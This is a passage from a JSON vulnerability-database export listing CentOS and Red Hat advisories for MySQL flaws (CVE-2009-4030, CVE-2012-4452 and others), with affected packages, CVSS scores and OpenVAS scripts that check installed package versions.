"CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-bench-5.0.95-3.el5.i386.rpm", "packageName": "mysql-bench", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-server-5.0.95-3.el5.x86_64.rpm", "packageName": "mysql-server", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-5.0.95-3.el5.x86_64.rpm", "packageName": "mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-test-5.0.95-3.el5.x86_64.rpm", "packageName": "mysql-test", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-5.0.95-3.el5.i386.rpm", "packageName": "mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-5.0.95-3.el5.i386.rpm", "packageName": "mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-devel-5.0.95-3.el5.i386.rpm", "packageName": "mysql-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "packageFilename": "mysql-devel-5.0.95-3.el5.i386.rpm", "packageName": "mysql-devel", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2013:0121\n\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nIt was found that the fix for the CVE-2009-4030 issue, a flaw in the way\nMySQL checked the paths used as arguments for the DATA DIRECTORY and INDEX\nDIRECTORY directives when the \"datadir\" option was configured with a\nrelative path, was incorrectly removed when the mysql packages in Red Hat\nEnterprise Linux 5 were updated to version 5.0.95 via RHSA-2012:0127. An\nauthenticated attacker could use this flaw to bypass the restriction\npreventing the use of subdirectories of the MySQL data directory being used\nas DATA DIRECTORY and INDEX DIRECTORY paths. This update re-applies the fix\nfor CVE-2009-4030. (CVE-2012-4452)\n\nNote: If the use of the DATA DIRECTORY and INDEX DIRECTORY directives were\ndisabled as described in RHSA-2010:0109 (by adding \"symbolic-links=0\" to\nthe \"[mysqld]\" section of the \"my.cnf\" configuration file), users were not\nvulnerable to this issue.\n\nThis issue was discovered by Karel Volny of the Red Hat Quality Engineering\nteam.\n\nThis update also fixes the following bugs:\n\n* Prior to this update, the log file path in the logrotate script did not\nbehave as expected. As a consequence, the logrotate function failed to\nrotate the \"/var/log/mysqld.log\" file. This update modifies the logrotate\nscript to allow rotating the mysqld.log file. (BZ#647223)\n\n* Prior to this update, the mysqld daemon could fail when using the EXPLAIN\nflag in prepared statement mode. This update modifies the underlying code\nto handle the EXPLAIN flag as expected. (BZ#654000)\n\n* Prior to this update, the mysqld init script could wrongly report that\nmysql server startup failed when the server was actually started. This\nupdate modifies the init script to report the status of the mysqld server\nas expected. (BZ#703476)\n\n* Prior to this update, the \"--enable-profiling\" option was by default\ndisabled. This update enables the profiling feature. (BZ#806365)\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-January/000403.html\n\n**Affected packages:**\nmysql\nmysql-bench\nmysql-devel\nmysql-server\nmysql-test\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-0121.html", "edition": 4, "reporter": "CentOS Project", "published": "2013-01-11T13:18:41", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "mysql security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2012-4452", "CVE-2009-4030"], "modified": "2013-01-11T13:18:41", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-January/000403.html", "id": "CESA-2013:0121", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-10-03T18:24:26", "references": ["http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B", "https://rhn.redhat.com/errata/RHSA-2010-0110.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-bench-4.1.22-2.el4_8.3.x86_64.rpm", "packageName": "mysql-bench", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-server-4.1.22-2.el4_8.3.x86_64.rpm", "packageName": "mysql-server", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-bench-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql-bench", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-devel-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-4.1.22-2.el4_8.3.x86_64.rpm", "packageName": "mysql", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-4.1.22-2.el4_8.3.src.rpm", "packageName": "mysql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-4.1.22-2.el4_8.3.src.rpm", "packageName": "mysql", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-server-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql-server", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-devel-4.1.22-2.el4_8.3.x86_64.rpm", "packageName": "mysql-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "packageFilename": "mysql-4.1.22-2.el4_8.3.i386.rpm", "packageName": "mysql", "arch": "i386", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0110\n\n\nMySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nMultiple flaws were discovered in the way MySQL handled symbolic links to\ntables created using the DATA DIRECTORY and INDEX DIRECTORY directives in\nCREATE TABLE statements. An attacker with CREATE and DROP table privileges\nand shell access to the database server could use these flaws to escalate\ntheir database privileges, or gain access to tables created by other\ndatabase users. (CVE-2008-4098, CVE-2009-4030)\n\nNote: Due to the security risks and previous security issues related to the\nuse of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\ndepending on this feature should consider disabling it by adding\n\"symbolic-links=0\" to the \"[mysqld]\" section of the \"my.cnf\" configuration\nfile. In this update, an example of such a configuration was added to the\ndefault \"my.cnf\" file.\n\nAn insufficient HTML entities quoting flaw was found in the mysql command\nline client's HTML output mode. If an attacker was able to inject arbitrary\nHTML tags into data stored in a MySQL database, which was later retrieved\nusing the mysql command line client and its HTML output mode, they could\nperform a cross-site scripting (XSS) attack against victims viewing the\nHTML output in a web browser. (CVE-2008-4456)\n\nMultiple format string flaws were found in the way the MySQL server logged\nuser commands when creating and deleting databases. A remote, authenticated\nattacker with permissions to CREATE and DROP databases could use these\nflaws to formulate a specially-crafted SQL command that would cause a\ntemporary denial of service (open connections to mysqld are terminated).\n(CVE-2009-2446)\n\nNote: To exploit the CVE-2009-2446 flaws, the general query log (the mysqld\n\"--log\" command line option or the \"log\" option in \"my.cnf\") must be\nenabled. This logging is not enabled by default.\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016501.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016502.html\n\n**Affected packages:**\nmysql\nmysql-bench\nmysql-devel\nmysql-server\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2010-0110.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-02-17T16:42:25", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "title": "mysql security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2009-2446", "CVE-2008-4456", "CVE-2009-4030", "CVE-2008-4098"], "modified": "2010-02-17T16:42:49", "href": "http://lists.centos.org/pipermail/centos-announce/2010-February/016501.html", "id": "CESA-2010:0110", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "redhat": [{"lastseen": "2018-12-11T17:45:26", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.0.77-4.el5_4.2", "arch": "i386", "packageName": "mysql", "packageFilename": "mysql-5.0.77-4.el5_4.2.i386.rpm", "operator": "lt"}], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nIt was discovered that the MySQL client ignored certain SSL certificate\nverification errors when connecting to servers. A man-in-the-middle\nattacker could use this flaw to trick MySQL clients into connecting to a\nspoofed MySQL server. (CVE-2009-4028)\n\nNote: This fix may uncover previously hidden SSL configuration issues, such\nas incorrect CA certificates being used by clients or expired server\ncertificates. This update should be carefully tested in deployments where\nSSL connections are used.\n\nA flaw was found in the way MySQL handled SELECT statements with subqueries\nin the WHERE clause, that assigned results to a user variable. A remote,\nauthenticated attacker could use this flaw to crash the MySQL server daemon\n(mysqld). This issue only caused a temporary denial of service, as the\nMySQL daemon was automatically restarted after the crash. (CVE-2009-4019)\n\nWhen the \"datadir\" option was configured with a relative path, MySQL did\nnot properly check paths used as arguments for the DATA DIRECTORY and INDEX\nDIRECTORY directives. An authenticated attacker could use this flaw to\nbypass the restriction preventing the use of subdirectories of the MySQL\ndata directory being used as DATA DIRECTORY and INDEX DIRECTORY paths.\n(CVE-2009-4030)\n\nNote: Due to the security risks and previous security issues related to the\nuse of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\ndepending on this feature should consider disabling it by adding\n\"symbolic-links=0\" to the \"[mysqld]\" section of the \"my.cnf\" configuration\nfile. In this update, an example of such a configuration was added to the\ndefault \"my.cnf\" file.\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.", "reporter": "RedHat", "published": "2010-02-16T05:00:00", "type": "redhat", "title": "(RHSA-2010:0109) Moderate: mysql security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-4019", "CVE-2009-4028", "CVE-2009-4030"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:47:46", "id": "RHSA-2010:0109", "href": "https://access.redhat.com/errata/RHSA-2010:0109", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T17:43:27", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "5", "packageVersion": "5.0.95-3.el5", "arch": "i386", "packageName": "mysql-debuginfo", "packageFilename": "mysql-debuginfo-5.0.95-3.el5.i386.rpm", "operator": "lt"}], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nIt was found that the fix for the CVE-2009-4030 issue, a flaw in the way\nMySQL checked the paths used as arguments for the DATA DIRECTORY and INDEX\nDIRECTORY directives when the \"datadir\" option was configured with a\nrelative path, was incorrectly removed when the mysql packages in Red Hat\nEnterprise Linux 5 were updated to version 5.0.95 via RHSA-2012:0127. An\nauthenticated attacker could use this flaw to bypass the restriction\npreventing the use of subdirectories of the MySQL data directory being used\nas DATA DIRECTORY and INDEX DIRECTORY paths. This update re-applies the fix\nfor CVE-2009-4030. (CVE-2012-4452)\n\nNote: If the use of the DATA DIRECTORY and INDEX DIRECTORY directives were\ndisabled as described in RHSA-2010:0109 (by adding \"symbolic-links=0\" to\nthe \"[mysqld]\" section of the \"my.cnf\" configuration file), users were not\nvulnerable to this issue.\n\nThis issue was discovered by Karel Volny of the Red Hat Quality Engineering\nteam.\n\nThis update also fixes the following bugs:\n\n* Prior to this update, the log file path in the logrotate script did not\nbehave as expected. As a consequence, the logrotate function failed to\nrotate the \"/var/log/mysqld.log\" file. This update modifies the logrotate\nscript to allow rotating the mysqld.log file. (BZ#647223)\n\n* Prior to this update, the mysqld daemon could fail when using the EXPLAIN\nflag in prepared statement mode. This update modifies the underlying code\nto handle the EXPLAIN flag as expected. (BZ#654000)\n\n* Prior to this update, the mysqld init script could wrongly report that\nmysql server startup failed when the server was actually started. This\nupdate modifies the init script to report the status of the mysqld server\nas expected. (BZ#703476)\n\n* Prior to this update, the \"--enable-profiling\" option was by default\ndisabled. This update enables the profiling feature. (BZ#806365)\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.\n", "reporter": "RedHat", "published": "2013-01-08T05:00:00", "type": "redhat", "title": "(RHSA-2013:0121) Low: mysql security and bug fix update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2009-4030", "CVE-2012-4452"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:18:22", "id": "RHSA-2013:0121", "href": "https://access.redhat.com/errata/RHSA-2013:0121", "cvss": {"score": 4.4, "vector": "AV:LOCAL/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-12-11T17:43:00", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "4.1.22-2.el4_8.3", "arch": "i386", "packageName": "mysql-server", "packageFilename": "mysql-server-4.1.22-2.el4_8.3.i386.rpm", "operator": "lt"}], "description": "MySQL is a multi-user, multi-threaded SQL database server. It consists of\nthe MySQL server daemon (mysqld) and many client programs and libraries.\n\nMultiple flaws were discovered in the way MySQL handled symbolic links to\ntables created using the DATA DIRECTORY and INDEX DIRECTORY directives in\nCREATE TABLE statements. An attacker with CREATE and DROP table privileges\nand shell access to the database server could use these flaws to escalate\ntheir database privileges, or gain access to tables created by other\ndatabase users. (CVE-2008-4098, CVE-2009-4030)\n\nNote: Due to the security risks and previous security issues related to the\nuse of the DATA DIRECTORY and INDEX DIRECTORY directives, users not\ndepending on this feature should consider disabling it by adding\n\"symbolic-links=0\" to the \"[mysqld]\" section of the \"my.cnf\" configuration\nfile. In this update, an example of such a configuration was added to the\ndefault \"my.cnf\" file.\n\nAn insufficient HTML entities quoting flaw was found in the mysql command\nline client's HTML output mode. If an attacker was able to inject arbitrary\nHTML tags into data stored in a MySQL database, which was later retrieved\nusing the mysql command line client and its HTML output mode, they could\nperform a cross-site scripting (XSS) attack against victims viewing the\nHTML output in a web browser. (CVE-2008-4456)\n\nMultiple format string flaws were found in the way the MySQL server logged\nuser commands when creating and deleting databases. A remote, authenticated\nattacker with permissions to CREATE and DROP databases could use these\nflaws to formulate a specially-crafted SQL command that would cause a\ntemporary denial of service (open connections to mysqld are terminated).\n(CVE-2009-2446)\n\nNote: To exploit the CVE-2009-2446 flaws, the general query log (the mysqld\n\"--log\" command line option or the \"log\" option in \"my.cnf\") must be\nenabled. This logging is not enabled by default.\n\nAll MySQL users are advised to upgrade to these updated packages, which\ncontain backported patches to resolve these issues. After installing this\nupdate, the MySQL server daemon (mysqld) will be restarted automatically.", "reporter": "RedHat", "published": "2010-02-16T05:00:00", "type": "redhat", "title": "(RHSA-2010:0110) Moderate: mysql security update", "enchantments": {"score": {"vector": "NONE", "value": 6.8}}, "bulletinFamily": "unix", "cvelist": ["CVE-2008-4098", "CVE-2008-4456", "CVE-2009-2446", "CVE-2009-4030"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:14:25", "id": "RHSA-2010:0110", "href": "https://access.redhat.com/errata/RHSA-2010:0110", "cvss": {"score": 8.5, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-09-28T18:24:39", "references": ["http://linux.oracle.com/errata/ELSA-2010-0109.html"], "pluginID": "1361412562310122394", "description": "Oracle Linux Local Security Checks ELSA-2010-0109", "edition": 6, "reporter": "Eero Volotinen", "published": "2015-10-06T00:00:00", "title": "Oracle Linux Local Check: ELSA-2010-0109", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "naslFamily": "Oracle Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2009-4030", "CVE-2009-4028", "CVE-2009-4019"], "modified": "2018-09-28T00:00:00", "id": "OPENVAS:1361412562310122394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310122394", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: ELSA-2010-0109.nasl 11688 2018-09-28 13:36:28Z cfischer $\n#\n# Oracle Linux Local Check\n#\n# Authors:\n# Eero Volotinen <eero.volotinen@solinor.com>\n#\n# Copyright:\n# Copyright (c) 2015 Eero Volotinen, http://solinor.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.122394\");\n script_version(\"$Revision: 11688 $\");\n script_tag(name:\"creation_date\", value:\"2015-10-06 14:18:10 +0300 (Tue, 06 Oct 2015)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-09-28 15:36:28 +0200 (Fri, 28 Sep 2018) $\");\n script_name(\"Oracle Linux Local Check: ELSA-2010-0109\");\n script_tag(name:\"insight\", value:\"ELSA-2010-0109 - mysql security update. Please see the references for more insight.\");\n script_tag(name:\"solution\", value:\"Update the affected packages to the latest available version.\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"summary\", value:\"Oracle Linux Local Security Checks ELSA-2010-0109\");\n script_xref(name:\"URL\", value:\"http://linux.oracle.com/errata/ELSA-2010-0109.html\");\n script_cve_id(\"CVE-2009-4019\", \"CVE-2009-4028\", \"CVE-2009-4030\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/oracle_linux\", \"ssh/login/release\", re:\"ssh/login/release=OracleLinux5\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Eero Volotinen\");\n script_family(\"Oracle Linux Local Security Checks\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release) exit(0);\n\nres = \"\";\n\nif(release == \"OracleLinux5\")\n{\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.0.77~4.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-bench\", rpm:\"mysql-bench~5.0.77~4.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-devel\", rpm:\"mysql-devel~5.0.77~4.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-server\", rpm:\"mysql-server~5.0.77~4.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n if ((res = isrpmvuln(pkg:\"mysql-test\", rpm:\"mysql-test~5.0.77~4.el5_4.2\", rls:\"OracleLinux5\")) != NULL) {\n security_message(data:res);\n exit(0);\n }\n\n}\nif (__pkg_match) exit(99);\n exit(0);\n\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-20T13:18:53", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034642.html", "2010-1348"], "pluginID": "1361412562310861651", "description": "Check for the Version of mysql", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "type": "openvas", "title": "Fedora Update for mysql FEDORA-2010-1348", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-7247", "CVE-2009-4019"], "modified": "2017-12-19T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861651", "id": "OPENVAS:1361412562310861651", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mysql FEDORA-2010-1348\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mysql on Fedora 12\";\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. MySQL is a\n client/server implementation consisting of a server daemon (mysqld)\n and many different client programs and libraries. The base package\n contains the standard MySQL client programs and generic MySQL files.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034642.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861651\");\n script_version(\"$Revision: 8168 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-19 08:30:15 +0100 (Tue, 19 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-1348\");\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\");\n script_name(\"Fedora Update for mysql FEDORA-2010-1348\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC12\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.42~7.fc12\", rls:\"FC12\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-01-18T11:05:19", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034591.html", "2010-1300"], "pluginID": "1361412562310861707", "description": "Check for the Version of mysql", "edition": 1, "reporter": "Copyright (c) 2010 Greenbone Networks GmbH", "published": "2010-03-02T00:00:00", "title": "Fedora Update for mysql FEDORA-2010-1300", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Fedora Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2008-7247", "CVE-2009-4019"], "modified": "2018-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310861707", "id": "OPENVAS:1361412562310861707", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for mysql FEDORA-2010-1300\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2010 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"mysql on Fedora 11\";\ntag_insight = \"MySQL is a multi-user, multi-threaded SQL database server. MySQL is a\n client/server implementation consisting of a server daemon (mysqld)\n and many different client programs and libraries. The base package\n contains the standard MySQL client programs and generic MySQL files.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034591.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.861707\");\n script_version(\"$Revision: 8447 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-17 17:12:19 +0100 (Wed, 17 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2010-03-02 08:38:02 +0100 (Tue, 02 Mar 2010)\");\n script_tag(name:\"cvss_base\", value:\"6.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:S/C:P/I:P/A:P\");\n script_xref(name: \"FEDORA\", value: \"2010-1300\");\n script_cve_id(\"CVE-2008-7247\", \"CVE-2009-4019\");\n script_name(\"Fedora Update for mysql FEDORA-2010-1300\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of mysql\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2010 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC11\")\n{\n\n if ((res = isrpmvuln(pkg:\"mysql\", rpm:\"mysql~5.1.42~7.fc11\", rls:\"FC11\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 6.0, "vector": "AV:NETWORK/AC:MEDIUM/Au:SINGLE_INSTANCE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2017-12-12T11:11:25", "references": ["http://lists.fedoraproject.org/pipermail/package-announce/2010-February/034642.html", "2010-1348"], "pluginID": 